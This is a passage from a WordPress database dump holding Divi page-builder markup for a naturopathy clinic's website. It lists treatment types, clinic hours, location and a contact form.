header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-26 20:12:17','2021-05-26 12:12:17','',28,'https://verde.desidrivers.com.au/?p=191',0,'revision','',0),(195,1,'2021-05-26 20:27:03','2021-05-26 12:27:03','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_bg_enable_color=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-05-26 20:27:03','2021-05-26 12:27:03','',188,'https://verde.desidrivers.com.au/?p=195',0,'revision','',0),(196,1,'2021-05-26 20:27:17','2021-05-26 12:27:17','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||0px||false|false\" hover_enabled=\"0\" locked=\"off\" background_enable_image=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" background_enable_color=\"off\" sticky_enabled=\"0\" custom_margin=\"||60px|||\" min_height=\"224px\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\" min_height=\"560px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\" min_height=\"665px\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" background_enable_image=\"off\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit Message\" _builder_version=\"4.9.4\" form_field_background_color=\"#CCD4C8\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" sticky_enabled=\"0\" form_field_font=\"Montserrat||||||||\" button_bg_enable_color=\"on\" button_border_color=\"#000000\" form_field_background_color__hover_enabled=\"on|desktop\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong>Clinic location:</strong></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" 